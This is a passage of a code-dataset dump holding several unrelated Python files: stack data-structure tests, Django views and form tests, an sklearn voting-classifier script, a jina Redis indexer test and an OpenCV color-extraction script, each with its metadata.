v:\n assert getattr(layer, attr) == v\n else:\n assert getattr(layer, attr) is None\n\n test('stack', stack)\n test('prev_layer', prev_layer)\n test('next_layer', next_layer)\n\n\ndef test_init():\n s = stack.Stack()\n assert s.head is None\n\n\ndef test_add_layer():\n s = stack.Stack()\n l = stack.Layer()\n\n s.append(l)\n\n assert s.head == l\n assert_layer_state(l, stack=s)\n\n\ndef test_add_multiple_layers():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n\n assert s.head == l3\n assert_layer_state(l1, next_layer=l2, stack=s)\n assert_layer_state(l2, next_layer=l3, prev_layer=l1, stack=s)\n assert_layer_state(l3, prev_layer=l2, stack=s)\n\n\ndef test_remove_layer_from_top():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n\n l3.remove()\n\n 
assert s.head == l2\n assert_layer_state(l1, next_layer=l2, stack=s)\n assert_layer_state(l2, prev_layer=l1, stack=s)\n assert_layer_state(l3)\n\n\ndef test_remove_layer_from_bottom():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n\n l1.remove()\n\n assert s.head == l3\n assert_layer_state(l1)\n assert_layer_state(l2, next_layer=l3, stack=s)\n assert_layer_state(l3, prev_layer=l2, stack=s)\n\n\ndef test_remove_layer_from_middle():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n\n l2.remove()\n\n assert s.head == l3\n assert_layer_state(l1, next_layer=l3, stack=s)\n assert_layer_state(l2)\n assert_layer_state(l3, prev_layer=l1, stack=s)\n\n\ndef test_remove_between():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n l4 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n s.append(l4)\n\n stack.remove_between(l1, l4)\n\n assert s.head == l4\n assert_layer_state(l1, next_layer=l4, stack=s)\n assert_layer_state(l4, prev_layer=l1, stack=s)\n\n\ndef test_iter():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n l4 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n s.append(l4)\n\n assert list(s) == [l4, l3, l2, l1]\n", "sub_path": "tests/utils/data_structs/test_stack.py", "file_name": "test_stack.py", "file_ext": "py", "file_size_in_byte": 2618, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pycm.utils.data_structs.stack", "line_number": 10, "usage_type": "argument"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 16, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 16, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 21, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 21, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 22, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 22, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 31, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 31, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 33, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 33, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 34, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 34, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 35, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 35, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 48, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 48, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 50, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 50, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 51, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 51, "usage_type": 
"name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 52, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 52, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 67, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 67, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 69, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 69, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 70, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 70, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 71, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 71, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 86, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 86, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 88, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 88, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 89, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 89, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 90, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 90, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 105, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 105, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 107, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 107, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 108, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 108, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 109, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 109, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 110, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 110, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.remove_between", "line_number": 117, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 117, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 125, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 125, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 127, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 127, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 128, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 128, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 129, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 129, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", 
"line_number": 130, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "405050323", "text": "from django.shortcuts import render, redirect\nfrom django.http import HttpResponseRedirect\n\nfrom .models import KebutuhanMaterial, Proses, StasiunKerja\nfrom .forms import KebutuhanMaterialForm\nfrom produk.models import Varian\nfrom produk.models import Material\nfrom django.db.models import Count, F\n\n\ndef newMaterial(request):\n kebutuhanMaterial_form = KebutuhanMaterialForm(request.POST or None)\n\n # masukin data dari form ke database\n if request.method == 'POST':\n id = request.POST.get('id')\n proses = request.POST.get('proses')\n material = request.POST.get('material')\n\n proses_sk = Proses.objects.get(idProses=proses)\n p_sk = str(proses_sk.stasiunKerja)\n idm = Material.objects.get(id=material)\n mid = str(idm.idMaterial)\n var = str(idm.varian)\n varmat = Varian.objects.get(idVarian = var)\n idmaterial = Material.objects.filter(idMaterial=mid, varian = varmat).first()\n stasiunKerja = StasiunKerja.objects.get(idStasiunKerja=p_sk)\n\n KebutuhanMaterial.objects.create(id=id, stasiunKerja=stasiunKerja,material=idm, proses=proses_sk,)\n\n material = KebutuhanMaterial.objects.filter(stasiunKerja=stasiunKerja).filter(material__idMaterial=idmaterial, material__varian = varmat).first()\n km = material.jumlahMaterialPerCycleTime\n kumulatif = km+1\n\n KebutuhanMaterial.objects.filter(material__idMaterial=idmaterial, material__varian = varmat).update(jumlahMaterialPerCycleTime=kumulatif)\n next = request.POST.get('next', '/')\n return HttpResponseRedirect(next)\n\n context = {\n 'Judul': 'Tambah Kebutuhan Material',\n 'kebutuhanMaterial_form': kebutuhanMaterial_form,\n }\n return render(request, 'liniProduksi/newMaterial.html', context)\n\ndef deleteMaterial(request, delete_id):\n #cara delete\n KebutuhanMaterial.objects.filter(id=delete_id).delete()\n next = request.POST.get('next', '/')\n if request.method == 'GET':\n next = request.GET.get('next', '/')\n return HttpResponseRedirect(next)\n\ndef updateMaterial(request, update_id):\n #cara edit Produk\n kebutuhanMaterial_update = KebutuhanMaterial.objects.get(id=update_id)\n kebutuhanMaterial_form = KebutuhanMaterialForm(request.POST or None, instance=kebutuhanMaterial_update)\n\n if request.method == 'POST':\n proses = request.POST.get('proses')\n material = request.POST.get('material')\n\n proses_sk = Proses.objects.get(idProses=proses)\n p_sk = str(proses_sk.stasiunKerja)\n idm = Material.objects.get(id=material)\n stasiunKerja = StasiunKerja.objects.get(idStasiunKerja=p_sk)\n\n KebutuhanMaterial.objects.filter(id=update_id).update(stasiunKerja=stasiunKerja,material=idm, proses=proses_sk,)\n next = request.POST.get('next', '/')\n return HttpResponseRedirect(next)\n\n context = {\n 'Judul': 'Update Kebutuhan Material',\n 'kebutuhanMaterial_form': kebutuhanMaterial_form,\n }\n\n return render(request,'liniProduksi/newMaterial.html',context)", "sub_path": "liniProduksi/viewsMaterial.py", "file_name": "viewsMaterial.py", "file_ext": "py", "file_size_in_byte": 3058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "forms.KebutuhanMaterialForm", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Proses.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Proses.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Proses", "line_number": 
20, "usage_type": "name"}, {"api_name": "produk.models.Material.objects.get", "line_number": 22, "usage_type": "call"}, {"api_name": "produk.models.Material.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "produk.models.Material", "line_number": 22, "usage_type": "name"}, {"api_name": "produk.models.Varian.objects.get", "line_number": 25, "usage_type": "call"}, {"api_name": "produk.models.Varian.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "produk.models.Varian", "line_number": 25, "usage_type": "name"}, {"api_name": "produk.models.Material.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "produk.models.Material.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "produk.models.Material", "line_number": 26, "usage_type": "name"}, {"api_name": "models.StasiunKerja.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "models.StasiunKerja.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.StasiunKerja", "line_number": 27, "usage_type": "name"}, {"api_name": "models.KebutuhanMaterial.objects.create", "line_number": 29, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 29, "usage_type": "name"}, {"api_name": "models.KebutuhanMaterial.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 31, "usage_type": "name"}, {"api_name": "models.KebutuhanMaterial.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 35, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects.filter", "line_number": 47, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 47, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 51, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 55, "usage_type": "name"}, {"api_name": "forms.KebutuhanMaterialForm", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Proses.objects.get", "line_number": 62, "usage_type": "call"}, {"api_name": "models.Proses.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models.Proses", "line_number": 62, "usage_type": "name"}, {"api_name": "produk.models.Material.objects.get", "line_number": 64, "usage_type": "call"}, {"api_name": "produk.models.Material.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "produk.models.Material", "line_number": 64, "usage_type": "name"}, {"api_name": "models.StasiunKerja.objects.get", "line_number": 65, "usage_type": "call"}, {"api_name": "models.StasiunKerja.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.StasiunKerja", 
"line_number": 65, "usage_type": "name"}, {"api_name": "models.KebutuhanMaterial.objects.filter", "line_number": 67, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 67, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 69, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "86169407", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 22 16:24:18 2018\n\n@author: Ayoub El khallioui\n\"\"\"\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\n\niris=load_iris()\nX=iris.data\ny=iris.target\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.33,random_state=40)\n\ndef proba_sample(pipeline,sample,X_train,y_train,X_test):\n pipeline.fit(X_train,y_train)\n proba=pipeline.predict_proba(X_test[sample].reshape(1,-1))\n return proba\n\ndef Voting(weights):\n pipeline_LR=Pipeline([('scaler',StandardScaler()),('clf',LogisticRegression(random_state=42))])\n pipeline_SVC=Pipeline([('scaler',StandardScaler()),('clf',SVC(random_state=42,probability=True))])\n pipeline_DT=Pipeline([('scaler',StandardScaler()),('clf',DecisionTreeClassifier(random_state=42))])\n predictions=[]\n for i in range(len(X_test)):\n proba_LR=proba_sample(pipeline_LR,i,X_train,y_train,X_test)\n proba_SCV=proba_sample(pipeline_SVC,i,X_train,y_train,X_test)\n proba_DT=proba_sample(pipeline_DT,i,X_train,y_train,X_test)\n liste_proba_clf=np.concatenate((proba_LR,proba_SCV,proba_DT),axis=0)\n class_label=np.argmax(np.average(liste_proba_clf,axis=0,weights=weights))\n predictions.append(class_label)\n return predictions\n\"\"\"\ny_pred=Voting(weights=(0.5,0.4,0.1))\nprint('accuracy_score={}'.format(np.sum(y_pred==y_test)/len(y_test)))\n\"\"\"\ndef find_optimum_weights():\n liste_W=np.arange(0,1.1,0.1)\n combinations=[(w_LR,w_SCV,w_DT) for w_LR in liste_W for w_SCV in liste_W for w_DT in liste_W]\n weights=list(filter(lambda x:x[0]+x[1]+x[2] <= 1 and x[0]+x[1]+x[2] > 0 ,combinations))\n accuracy_score=[]\n for combination in weights:\n y_pred=Voting(weights=combination)\n accuracy=np.sum(y_pred==y_test)/len(y_test)\n accuracy_score.append(accuracy)\n optimum_combination=weights[accuracy_score.index(max(accuracy_score))]\n return optimum_combination\n\nWeights=find_optimum_weights()\ny_pred=Voting(weights=Weights)\nprint('accuracy_score={}'.format(np.sum(y_pred==y_test)/len(y_test)))\n\n", "sub_path": "Classifier_Voting.py", "file_name": "Classifier_Voting.py", "file_ext": "py", "file_size_in_byte": 2329, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", 
"line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "170996531", "text": "import os\nimport random\nimport pytest\nimport numpy as np\n\nfrom google.protobuf.json_format import MessageToJson\nfrom jina.executors.indexers import BaseIndexer\nfrom jina.executors.metas import get_default_metas\nfrom jina.drivers.helper import array2pb\nfrom jina.proto import jina_pb2, uid\n\n\nfrom .. import RedisDBIndexer\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef metas(tmpdir):\n os.environ['TEST_WORKSPACE'] = str(tmpdir)\n metas = get_default_metas()\n metas['workspace'] = os.environ['TEST_WORKSPACE']\n yield metas\n del os.environ['TEST_WORKSPACE']\n\n\ndef random_docs(num_docs, chunks_per_doc=5, embed_dim=10, jitter=1):\n c_id = 3 * num_docs # avoid collision with docs\n for j in range(num_docs):\n d = jina_pb2.Document()\n d.tags['id'] = j\n d.text = b'hello world doc id %d' % j\n d.embedding.CopyFrom(array2pb(np.random.random([embed_dim + np.random.randint(0, jitter)])))\n d.id = uid.new_doc_id(d)\n yield d\n\n\ndef test_redis_db_indexer(metas):\n num_docs = 5\n docs = list(random_docs(num_docs=num_docs,\n chunks_per_doc=3))\n keys = [uid.id2hash(doc.id) for doc in docs]\n values = [doc.SerializeToString() for doc in docs]\n\n query_index = random.randint(0, num_docs - 1)\n query_id = docs[query_index].id\n query_key = uid.id2hash(query_id)\n query_text = docs[query_index].text\n\n with RedisDBIndexer(metas=metas) as idx:\n idx.add(keys=keys, values=values)\n\n with RedisDBIndexer(metas=metas) as redis_query:\n query_results = redis_query.query(key=query_key)\n for result in query_results:\n assert result is not None\n assert result['key'] == str(query_key).encode()\n d = jina_pb2.Document()\n d.ParseFromString(result['values'])\n assert d.text == query_text\n", "sub_path": "indexers/keyvalue/RedisDBIndexer/tests/test_redisdbindexer.py", "file_name": "test_redisdbindexer.py", "file_ext": "py", "file_size_in_byte": 1857, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "jina.executors.metas.get_default_metas", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 16, "usage_type": "call"}, {"api_name": "jina.proto.jina_pb2.Document", "line_number": 28, "usage_type": "call"}, {"api_name": "jina.proto.jina_pb2", "line_number": 28, "usage_type": "name"}, {"api_name": "jina.drivers.helper.array2pb", "line_number": 
31, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "jina.proto.uid.new_doc_id", "line_number": 32, "usage_type": "call"}, {"api_name": "jina.proto.uid", "line_number": 32, "usage_type": "name"}, {"api_name": "jina.proto.uid.id2hash", "line_number": 40, "usage_type": "call"}, {"api_name": "jina.proto.uid", "line_number": 40, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "jina.proto.uid.id2hash", "line_number": 45, "usage_type": "call"}, {"api_name": "jina.proto.uid", "line_number": 45, "usage_type": "name"}, {"api_name": "jina.proto.jina_pb2.Document", "line_number": 56, "usage_type": "call"}, {"api_name": "jina.proto.jina_pb2", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "604067022", "text": "from django.test import TestCase, Client\nfrom django.contrib.auth.models import User\n\nimport datetime\nfrom django.utils.timezone import make_aware\n\nfrom mute.models import MuteEvent\nfrom mute.forms import InstantForm, MuteForm\n\nclass TestForms(TestCase):\n\n def setUp(self):\n self.u = User.objects.create_user( username='TestUser',\n password='testing',\n email='test@email.com')\n\n # Create nine existing mutes.\n for i in range(9):\n event_x = MuteEvent.objects.create(\n screen_name_muter = self.u,\n screen_name_mutee = 'jsamaudio',\n mute_on = make_aware(datetime.datetime(2020,i+1,4,2,2,2), timezone=None),\n mute_off = make_aware(datetime.datetime(2020,i+1,4,2,20,2), timezone=None),\n reoccuring = 'Not',\n past = False,\n )\n event_x.save()\n\n\n def test_instant_form(self):\n form = InstantForm(data = {\n 'screen_name_mutee' : ''\n })\n self.assertFalse(form.is_valid())\n form = InstantForm(data = {\n 'screen_name_mutee' : 'this is not a valid screen name to mute'\n })\n self.assertFalse(form.is_valid())\n form = InstantForm(data = {\n 'screen_name_mutee' : 'valid name'\n })\n self.assertTrue(form.is_valid())\n\n def test_mute_event_form(self):\n form = MuteForm(data = {\n 'screen_name_muter' : self.u.id,\n 'screen_name_mutee' : 'jsamaudio' ,\n 'mute_on' : '2018-08-09 01:01:01', # Values have no time zone as\n 'mute_off' : '2018-08-10 01:01:01', # the form requires naive data\n 'reoccuring' : 'Not',\n 'past' : False,\n })\n self.assertTrue(form.is_valid())\n\n form.save()\n events = MuteEvent.objects.all()\n event = events[len(events)-1]\n\n test_on = make_aware(datetime.datetime(2018,8,9,1,1,1), timezone=None)\n test_off = make_aware(datetime.datetime(2018,8,10,1,1,1), timezone=None)\n\n self.assertEqual('jsamaudio', event.screen_name_mutee)\n self.assertEqual(test_on, event.mute_on)\n self.assertEqual(test_off, event.mute_off)\n self.assertEqual('Not', event.reoccuring)\n self.assertEqual(False, event.past)\n self.assertEqual(10, len(events))\n\n # Test the fifteen minute difference on/off requirement.\n form = MuteForm(data = {\n 'screen_name_muter' : self.u.id,\n 'screen_name_mutee' : 'jsamaudio' ,\n 'mute_on' : '2018-08-09 01:01:01', # Values have no time zone as\n 'mute_off' : '2018-08-09 01:02:01', # the form requires naive data\n 'reoccuring' : 'Not',\n 'past' : False,\n })\n self.assertFalse(form.is_valid())\n event.delete()\n form = MuteForm(data = {\n 'screen_name_muter' : self.u.id,\n 'screen_name_mutee' : 'jsamaudio' ,\n 'mute_on' : '2018-08-09 01:01:01', # Values have no time zone as\n 
'mute_off' : '2018-08-10 01:20:01', # the form requires naive data\n 'reoccuring' : 'Not',\n 'past' : False,\n })\n self.assertTrue(form.is_valid())\n", "sub_path": "mute/tests/test_forms.py", "file_name": "test_forms.py", "file_ext": "py", "file_size_in_byte": 3310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 10, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 13, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 13, "usage_type": "name"}, {"api_name": "mute.models.MuteEvent.objects.create", "line_number": 19, "usage_type": "call"}, {"api_name": "mute.models.MuteEvent.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mute.models.MuteEvent", "line_number": 19, "usage_type": "name"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "call"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "call"}, {"api_name": "mute.forms.InstantForm", "line_number": 31, "usage_type": "call"}, {"api_name": "mute.forms.InstantForm", "line_number": 35, "usage_type": "call"}, {"api_name": "mute.forms.InstantForm", "line_number": 39, "usage_type": "call"}, {"api_name": "mute.forms.MuteForm", "line_number": 45, "usage_type": "call"}, {"api_name": "mute.models.MuteEvent.objects.all", "line_number": 56, "usage_type": "call"}, {"api_name": "mute.models.MuteEvent.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "mute.models.MuteEvent", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "call"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "call"}, {"api_name": "mute.forms.MuteForm", "line_number": 70, "usage_type": "call"}, {"api_name": "mute.forms.MuteForm", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "82012784", "text": "\r\nimport cv2\r\nimport numpy as np\r\nimport colorgram\r\n\r\nimg = cv2.imread('picture.jpg')\r\n\r\nprint(\"1) \\t Color Recognizer\")\r\nprint(\"2) \\t View Text of Picture\")\r\nprint(\"3) \\t Quit from program\")\r\ncho = int ( input(\"please enter your choice <1-3> : \") )\r\nprint(\" \")\r\n\r\nif cho == 3 :\r\n cv2.destroyAllWindows()\r\n \r\nif cho == 2 :\r\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n ret,threshold = cv2.threshold(gray,12,125,cv2.THRESH_BINARY)\r\n th = cv2.adaptiveThreshold(gray,125,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,115,1)\r\n \r\n cv2.imshow('page',img)\r\n cv2.imshow('paget',threshold)\r\n cv2.imshow('threshAdaptive',th)\r\n\r\nif cho == 1 :\r\n colors = colorgram.extract('picture.jpg', 4)\r\n\r\n # colorgram.extract returns Color objects, which let you access..\r\n # RGB, HSL, and what proportion of the image was that color.\r\n first_color = colors[0]\r\n rgb = first_color.rgb # e.g. (255, 151, 210)\r\n hsl = first_color.hsl # e.g. (230, 255, 203)\r\n proportion = first_color.proportion # e.g. 
0.34\r\n\r\n # RGB and HSL are named tuples, so values can be accessed as properties.\r\n # These all work just as well:\r\n red = rgb[0]\r\n red = rgb.r\r\n saturation = hsl[1]\r\n saturation = hsl.s\r\n \r\n i=0;\r\n while(i<4):\r\n print(colors[i])\r\n i = i+1\r\n print(\" \")\r\n", "sub_path": "imageProcessing/ColorRecognizer.py", "file_name": "ColorRecognizer.py", "file_ext": "py", "file_size_in_byte": 1341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "cv2.imread", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.adaptiveThreshold", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.ADAPTIVE_THRESH_GAUSSIAN_C", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "colorgram.extract", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "344580224", "text": "import bpy\nimport os\n\nfrom 